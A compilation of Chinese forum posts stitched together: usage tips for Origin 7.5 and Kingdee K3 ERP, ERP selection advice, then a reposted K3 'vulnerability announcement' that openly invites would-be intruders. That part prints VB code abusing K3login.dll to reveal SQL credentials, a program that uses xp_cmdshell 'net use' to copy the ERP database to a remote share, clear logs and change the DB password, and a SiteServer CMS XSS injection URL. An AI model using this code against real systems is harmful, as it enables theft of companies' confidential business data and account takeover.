第一篇：origin7.5使用心得

1.如何把origin7.5做的圖粘到word上？

答：先把實(shí)驗(yàn)數(shù)據(jù)做個(gè)圖保存到我的文檔里，然后新建word文檔，插入→對象→由文件新建→瀏覽(找到origin圖表)，再確定即可。（最簡單是直接copy page命令）

2.origin圖中帶漢字的，粘到word里面不顯示漢字而是一些問號，請問這種情況怎么處

理？

答：在origin里雙擊橫坐標(biāo)或縱坐標(biāo)title，出現(xiàn)text control，選擇字體，如宋體，輸入名稱，ok，edit，copy page，粘帖就可以了。

第二篇：K3使用心得

說明：本人是一客戶，操作中有一些體會，但計(jì)算機(jī)語言知之甚少，所述內(nèi)容不一定很嚴(yán)謹(jǐn)，不過應(yīng)該說還比較通俗。由于相關(guān)的使用手冊對操作已有說明，我這個(gè)說明與其角度不同，估且作為手冊的一點(diǎn)補(bǔ)充吧。本說明主要講如何使用，對軟件問題及安裝不涉及。文中涉及的不能修改、不能改變均指在操作界面不能處理。我想將這作為新手的借鑒材料，望大家提出意見和建議，包括結(jié)構(gòu)性的和功能上的。本說明的順序無規(guī)律，有點(diǎn)想到哪里說到哪里的感覺，其中一部分內(nèi)容在論壇中與大家交流過。

一、軟件安裝完后，管理員首先要對中間層有一個(gè)基本的了解。中間層的密碼很重要，忘了就得重裝中間層；中間層菜單上有一個(gè)“系統(tǒng)使用情況”的功能項(xiàng)，這一功能項(xiàng)是反映某一時(shí)刻正在使用系統(tǒng)的情況，如果有的單位站點(diǎn)較少，可以通過這里看出當(dāng)前使用的是哪些人，從而對使用人員進(jìn)行調(diào)節(jié)，將某些未用但沒有退出系統(tǒng)的用戶強(qiáng)行清除掉；在系統(tǒng)非正常退出時(shí)，中間層還保留其信息，大家在操作時(shí)會出現(xiàn)“當(dāng)前使用的功能與其他用戶沖突”、“該數(shù)據(jù)正在調(diào)用”等提示即與此相關(guān)，這時(shí)管理員需要在中間層選定對應(yīng)帳套，通過網(wǎng)絡(luò)控制清除相關(guān)信息。中間層的主要功能是建立新帳套、備份帳套和恢復(fù)帳套，這三項(xiàng)基本功能大家都應(yīng)該會的，需要指出的是大家在作出重大操作時(shí)，如修改數(shù)據(jù)庫、測試某一功能等情況下，要先備份。對于備份大家可以使用帳套自動(dòng)指備份，在你選擇好路徑和間隔時(shí)間后，系統(tǒng)會自動(dòng)將帳套備份到指定的地方。自動(dòng)備份要注意不要關(guān)閉，否則下一次備份中斷，該功能可以在中間層關(guān)閉后獨(dú)立運(yùn)行，該功能運(yùn)行時(shí)，顯示器右下角會有一個(gè)相應(yīng)的圖標(biāo)。中間層還有注冊帳套和取消注冊帳套兩個(gè)功能項(xiàng)。我是這樣理解的，取消注冊帳套類似于臨時(shí)禁用了該帳套，要恢復(fù)時(shí)只須注冊該帳套即可，這在需要暫時(shí)停止某一帳套，同時(shí)其他帳套正常使用情況下時(shí)適用。如果確實(shí)不需要某一帳套了，則使用帳套刪除。

系統(tǒng)默認(rèn)administrator這一用戶為管理員，其權(quán)限最大。管理員可以在中間層修改其密碼，也可以在進(jìn)入K3系統(tǒng)主控臺時(shí)修改。管理員對這兩個(gè)地方一般很熟悉，但一般操作員對更改密碼并不熟悉。對于操作員只能在進(jìn)入主控臺時(shí)更改密碼，方法為：雙擊K3快捷方式圖標(biāo)后，在主控臺處錄入自已的用戶和密碼，不要點(diǎn)擊確定，這時(shí)點(diǎn)擊主控臺左上角的修改密碼，修改完成后須錄入新密碼才能進(jìn)行系統(tǒng)。

二、進(jìn)入K3主界面后，菜單上的“設(shè)置--主控臺編輯”是以所設(shè)置的計(jì)算機(jī)為基礎(chǔ)的，即某一臺機(jī)器設(shè)置為特定的主控臺后，其他操作員進(jìn)來時(shí)都是一樣的。這樣大家在不熟悉的機(jī)器上如果看不到自己所需要的模塊，首先要想到其主菜單的設(shè)置更改造成的。菜單上的“設(shè)置—選項(xiàng)”中允許多個(gè)主采單同時(shí)存在是大家用得上的。如果你大部分時(shí)間只同時(shí)使用一個(gè)系統(tǒng)，則不選擇，如果你同時(shí)要打開多個(gè)界面，則選擇此選項(xiàng)。

主界面下有一個(gè)“我的K3”，這一功能項(xiàng)可以將大家常用的幾個(gè)功能項(xiàng)放在這里來，不論是哪個(gè)子系統(tǒng)的明細(xì)功能，只要設(shè)為常用功能，以后就可以直接在這里使用，不需要跨模塊選擇明細(xì)功能項(xiàng)?！拔业腒3”中還有一個(gè)即時(shí)消息中心，主要用于各操作員之間進(jìn)行業(yè)務(wù)交流，如提醒有單據(jù)需要增加、修改或刪除等，讓各操作員間實(shí)現(xiàn)在線交流。-----此帖被gychml于2003-12-3 20:07:52修改過.故障１：K3系統(tǒng)在憑證過帳或是在結(jié)帳的過程中提示：與其它用戶有沖突。

解決方法:

1、在客戶端中點(diǎn)“開始——程序——金蝶K3——客戶端部件——系統(tǒng)工具——網(wǎng)絡(luò)控制管理”進(jìn)入對應(yīng)的帳套，用“清除當(dāng)前任務(wù)”將多余的任務(wù)結(jié)束。

2、在服務(wù)器中進(jìn)入金蝶K3中間層的帳套管理，將所有的帳做好備份！然后點(diǎn)“系統(tǒng)——系統(tǒng)使用狀況”，用“清除當(dāng)前任務(wù)”工具將多余的任務(wù)結(jié)束

故障２：為什么用戶擁有倉存管理系統(tǒng)的管理權(quán)限，查看即時(shí)庫存仍提示沒有權(quán)限？

問題原因：即時(shí)庫存查詢屬性供應(yīng)鏈系統(tǒng)的公用功能，用戶進(jìn)行“供應(yīng)鏈公用設(shè)置”的權(quán)限設(shè)置。

解決方法：功能權(quán)限設(shè)置高級中設(shè)置用戶“供應(yīng)鏈系統(tǒng)公用設(shè)置”－“即時(shí)庫存”的相關(guān)權(quán)限設(shè)置。

故障３：固定資產(chǎn)計(jì)提減值準(zhǔn)備如何操作？

解決方法：在固定資產(chǎn)“變動(dòng)處理”中，選中要計(jì)提減值準(zhǔn)備的卡片，點(diǎn)擊“變動(dòng)”，在“原值與折舊”頁簽錄入“減值準(zhǔn)備”保存后，在“憑證管理”對變動(dòng)記錄生成憑證即可。

故障４：問題描述 固定資產(chǎn)部分清理一定要先拆分嗎？

解決方法：不一定，如果卡片上數(shù)量大于1，錄入要清理數(shù)量即可；如果數(shù)量等于1，需要先拆分，再去清理.多欄賬的設(shè)置。

K3系統(tǒng)在憑證過帳或是在結(jié)帳的過程中提示：與其它用戶有沖突。在進(jìn)行處理的時(shí)候不用備份帳套，因?yàn)榍宄宄?dāng)前任務(wù)并不影響業(yè)務(wù)數(shù)據(jù)。由于k3的產(chǎn)品不具備暫存功能，清除當(dāng)前任務(wù)可能會導(dǎo)致正在輸入的某些數(shù)據(jù)出錯(cuò)無法保存。

各位同行，本人今年參與公司ERP選型，由于各方面的因素，最終選擇金蝶K3。下面我講

講個(gè)人心得。

1.選型的時(shí)候要多了解軟件的功能，就算時(shí)間短也要進(jìn)行測試，測試的方法只需要自己擬訂幾份訂單，做幾個(gè)BOM跑幾遍流程基本上就可以看出效果。

2.一定要注意ERP的版本，我當(dāng)時(shí)就沒有了解清楚，時(shí)間也比較緊上面一直才催，所以吃了虧，原來金蝶K3是分成長版和專業(yè)版的，當(dāng)出演示測試的時(shí)候他們用的是專業(yè)版，合同的時(shí)候簽的是成長版，所以導(dǎo)致很多功能沒有或者有但是做的沒有那么好。所以大家以后在選擇ERP的時(shí)候一定要了解清楚，不管你選的是拿款軟件。

3.金蝶K3ERP總體的功能和架構(gòu)上還是算可以的（專業(yè)版）一些功能考慮的比較完善，但是生產(chǎn)管理MRP部分卻做的不是很好，他們的MRP分析是計(jì)算總需求的，不會理會訂單的跟蹤性，如果你要訂單跟蹤性（所有物料一定要與訂單掛鉤并且要在每個(gè)環(huán)節(jié)都能查到對應(yīng)的銷售訂單的話，那就建議你不要使用，因?yàn)閷?yīng)出來的是錯(cuò)的，如果出現(xiàn)插單的情況的話，你會發(fā)現(xiàn)，所對應(yīng)跟蹤出來的數(shù)據(jù)是錯(cuò)的）要求很強(qiáng)的話建議你不要選擇。

4.所有事情都要在簽合同前說清楚，不要相信軟件公司所謂的多少錢一天的實(shí)施費(fèi)，要在合同上寫清楚包項(xiàng)目，并寫清楚最起碼他們顧問要來多少天，當(dāng)然根據(jù)我4年的經(jīng)驗(yàn)一般軟件公司的顧問，他們除了熟悉他們軟件以外，給不出什么可行的建議給你們的，所以不要指望能在過程當(dāng)中學(xué)到什么東西，可以負(fù)責(zé)的給你們講，如果你們熟悉他們的軟件你做的比他們

好。

5、財(cái)務(wù)部分能不上的先不要上（買的時(shí)候也先不要買），等其他模塊都做好以后才上財(cái)務(wù)部分，不要相信軟件公司說的3個(gè)月內(nèi)能夠做好，那都是鬼話。前面的做好以后再和財(cái)務(wù)部的相關(guān)人員相量什么時(shí)候上財(cái)務(wù)部分。

附件中是我們公司選擇的模塊和實(shí)施價(jià)格，上面的價(jià)格按我個(gè)人想法可以再減2萬但是我們公司上面沒有想談價(jià)格的意思，所以我只是給他們講了下，沒有強(qiáng)力的壓他們價(jià)格。另外大家在選著站點(diǎn)的時(shí)候要生產(chǎn)管理部分的要多選幾個(gè)一般要10個(gè)以上比較合適。我就是當(dāng)初選了5個(gè)后來發(fā)現(xiàn)少了，不夠用。我們公司固定電腦100臺，全公司有1千人，個(gè)人覺得類

似我們公司規(guī)模的都可以參考。

金蝶2000版7.0,我使用好幾年了,作為單機(jī)版,感覺功能很全,一般中小型企業(yè)及行政事業(yè)單位用起來綽綽有余,近來,我在新建財(cái)務(wù)報(bào)表、過賬時(shí),卻發(fā)現(xiàn)了幾個(gè)小問題:希望各位同仁能幫幫我,如你有什么問題的話,我也可以盡可能的幫你喲.一.報(bào)表公式:不能用函數(shù),造成取數(shù)困難;二.現(xiàn)金流量表不能用,盡管軟件提供了菜單,可是不能使用;三.不能反過賬,要想回到上期的賬套,只有恢復(fù)在過賬時(shí)做的備份;四.我最覺得好用的還是該軟件的“工資”功能,類似Foxpro的處理方法和習(xí)慣,讓人用起來得心應(yīng)手.比起從網(wǎng)上下的工資軟件,方便多了.我單位從2001年開始啟用金蝶K3系統(tǒng)，包括總賬、固定資產(chǎn)、現(xiàn)金流量、報(bào)表系統(tǒng)等其他模塊。成本管理、物流管理軟件是自行開發(fā)的，包括銷售管理、倉儲管理、進(jìn)出口業(yè)務(wù)管理等軟件，自行開發(fā)軟件是滿足目前的需要，等時(shí)機(jī)成熟，還是要改用標(biāo)準(zhǔn)化軟件的。初始化工作及軟件調(diào)整工作方面的壓力是挺大的，但完成之后，感覺操作挺方便的，工作質(zhì)量有了很大提高。沒用過用友軟件，所以無法作出比較。

5月5號網(wǎng)站漏洞公告！！

金蝶K3出現(xiàn)嚴(yán)重安全漏洞，黑客可輕易讀取數(shù)據(jù)庫所有信息

想入侵的朋友趕緊速度了

估計(jì)其他ERP軟件里也不少類似的東西，有興趣的同學(xué)可以跟一下。轉(zhuǎn)載開始。

這個(gè)漏洞在K3 各個(gè)版本都存在并且一樣，包括新發(fā)版的K3 V12的3個(gè)版本。主要數(shù)據(jù)安全漏洞描述如下：

最大的安全漏洞在K3login.dll這個(gè)控件上，,它能明文顯示K3 ERP數(shù)據(jù)庫的密碼等信息，這是非常危險(xiǎn)的，簡單VB6.0代碼如下：

Dim k3lg As New k3Login.ClsLogin If k3lg.CheckLogin Then ?如果成功登錄，執(zhí)行下面語句 Msgbox k3lg.PropsString End If 運(yùn)行上述代碼后，會彈出對話框,顯示所有SQL數(shù)據(jù)庫信息

你們看看，客戶的ERP 數(shù)據(jù)庫安全是不是全部暴露出來了,這是致命的漏洞，一個(gè)企業(yè)的所有商業(yè)機(jī)密都在這個(gè)數(shù)據(jù)庫中，如該數(shù)據(jù)庫泄露出去，對企業(yè)的影響是致命的。由于K3 ERP的這個(gè)漏洞，網(wǎng)管完全不知道數(shù)據(jù)庫是如何泄露的（沒有采用黑客攻擊等非法手段，只是利用金蝶ERP軟件安全設(shè)計(jì)漏洞），這些漏洞金蝶集團(tuán)的開發(fā)人員提供的建議是（K3X經(jīng)理提供的建議）：采用WINDOWS模式認(rèn)證即可避免此漏洞，請各位修改認(rèn)證方式，避免企業(yè)內(nèi)部數(shù)據(jù)丟失！

K3 ERP登錄留下密碼痕跡漏洞，適合所有版本：當(dāng)用戶通過登錄界面登錄ERP后，會將登錄信息寫入注冊表中，包括服務(wù)器名稱、登錄密碼、用戶名稱等等,因此該注冊表就泄露了所有在計(jì)算機(jī)中登錄用戶的信息，其加密方式太簡單，只要幾次枚舉方式就可PJ，通過數(shù)學(xué)知識，如等差數(shù)列等規(guī)律，輕而易舉地將用戶密碼PJ，你們研究加密算法的人自己去看看規(guī)律,應(yīng)對方法：因此用戶最好定期清除注冊表的登錄痕跡，防止用戶密碼泄露。

利用金蝶ERP軟件中KDLOGIN.dll漏洞 遠(yuǎn)程備份服務(wù)器中ERP數(shù)據(jù)庫代碼如下（VB）： Public k3lg As New k3Login.ClsLogin Public cnn As New ADODB.Connection Public i As Integer Public j As Integer Public K As Integer Public S As Integer Public cnnstr As String Public databsnm As String Public Sub Main()On Error Resume Next If k3lg.CheckLogin Then i = InStr(k3lg.PropsString, “{“)j = InStr(k3lg.PropsString, “}”)

cnnstr = Mid(k3lg.PropsString, i + 1, j – i – 1)For K = 0 To Len(cnnstr)– 1 If Left(Right(cnnstr, K), 1)= “=” Then databsnm = Right(cnnstr, K – 1)Exit For End If Next K F001主窗口.帳套名稱 = k3lg.AcctName F001主窗口.Show End If End Sub Public Sub 備份數(shù)據(jù)庫(ByVal beifsjk As String)Screen.MousePointer = 13 Set cnn = New ADODB.Connection cnn.CommandTimeout = 0 cnn.Open cnnstr cnn.BeginTrans On Error GoTo cnn_err: Dim fy As String Dim fy001 As String Dim fy002 As String Dim jsj As String Dim yhu As String Dim mima As String Dim wenjian As String jsj = F001主窗口.計(jì)算機(jī)名稱.Text wenjian = F001主窗口.文件夾.Text mima = F001主窗口.用戶密碼.Text yhu = F001主窗口.用戶名稱.Text fy = “exec master..xp_cmdshell?net use z: ” & jsj &”-:special:1:-& wenjian & “ ” & mima & “ /user:”& jsj & “-:special:1:-& yhu & “?”

fy001 = “backup database ” & databsnm & ” to disk=?z:-:special:1:-& beifsjk & ” ?”

fy002 = “exec master..xp_cmdshell ?net use z: /delete? ” cnn.Execute fy cnn.Execute fy001 cnn.Execute fy002 cnn.CommitTrans cnn.Close Set cnn = Nothing Screen.MousePointer = vbDefault MsgBox “數(shù)據(jù)庫: ” & databsnm & ” 成功備份為: ” & beifsjk, vbInformation, “提示”

Exit Sub cnn_err: cnn.RollbackTrans cnn.Close Set cnn = Nothing Screen.MousePointer = vbDefault MsgBox Err.Description, vbInformation, “錯(cuò)誤提示” End Sub Public Sub 清除日志()Screen.MousePointer = 13 Set cnn = New ADODB.Connection cnn.CommandTimeout = 0 cnn.Open cnnstr cnn.BeginTrans On Error GoTo cnn_err: Dim fy As String Dim fy001 As String Dim fy002 As String fy = “dump transaction ” & databsnm & ” with truncate_only”

fy001 = “backup log ” & databsnm & ” with truncate_only”

fy002 = “dbcc shrinkdatabase(” & databsnm & “)” cnn.Execute fy cnn.Execute fy001 cnn.Execute fy002 cnn.CommitTrans cnn.Close Set cnn = Nothing Screen.MousePointer = vbDefault MsgBox “數(shù)據(jù)庫: ” & databsnm & “日志成功清除!”, vbInformation, “提示”

Exit Sub cnn_err: cnn.RollbackTrans cnn.Close Set cnn = Nothing Screen.MousePointer = vbDefault MsgBox Err.Description, vbInformation, “錯(cuò)誤提示” End Sub Public Sub 修改數(shù)據(jù)庫密碼函數(shù)()Screen.MousePointer = 13 Set cnn = New ADODB.Connection cnn.CommandTimeout = 0 cnn.Open cnnstr cnn.BeginTrans On Error GoTo cnn_err: Dim fy As String fy = “exec sp_password ” & “?” & F002數(shù)據(jù)庫密碼修改.輸入舊密碼 & “?”& “,” & “?” & F002數(shù)據(jù)庫密碼修改.新密碼確認(rèn).Text & “?” cnn.Execute fy cnn.CommitTrans cnn.Close Set cnn = Nothing Screen.MousePointer = vbDefault MsgBox “數(shù)據(jù)庫密碼成功修改!”, vbInformation, “提示”

Exit Sub cnn_err: cnn.RollbackTrans cnn.Close Set cnn = Nothing Screen.MousePointer = vbDefault MsgBox Err.Description, vbInformation, “錯(cuò)誤提示” End Sub =============== SiteServer CMS存在多處跨站漏洞

影響版本: SiteServer CMS 3.3.9

程序介紹: SiteServer CMS 網(wǎng)站內(nèi)容管理系統(tǒng)是定位于中高端市場的CMS內(nèi)容管理系統(tǒng)，能夠以最低的成本、最少的人力投入在最短的時(shí)間內(nèi)架設(shè)一個(gè)功能齊全、性能優(yōu)異、規(guī)模龐大的網(wǎng)站平臺

漏洞分析:

程序因register.aspx等多個(gè)頁面過濾不嚴(yán)導(dǎo)致跨站腳本攻擊漏洞

漏洞利用:

1.注冊頁面為過濾用戶提交非法參數(shù)導(dǎo)致跨站，插入跨站語句即可： http://demo.siteserver.cn/usercenter/register.aspx?ReturnUrl=">[XSS] 2.進(jìn)入用戶管理節(jié)目后，個(gè)人簽名以及空間描述插入跨站語句均可導(dǎo)致跨站漏洞 post: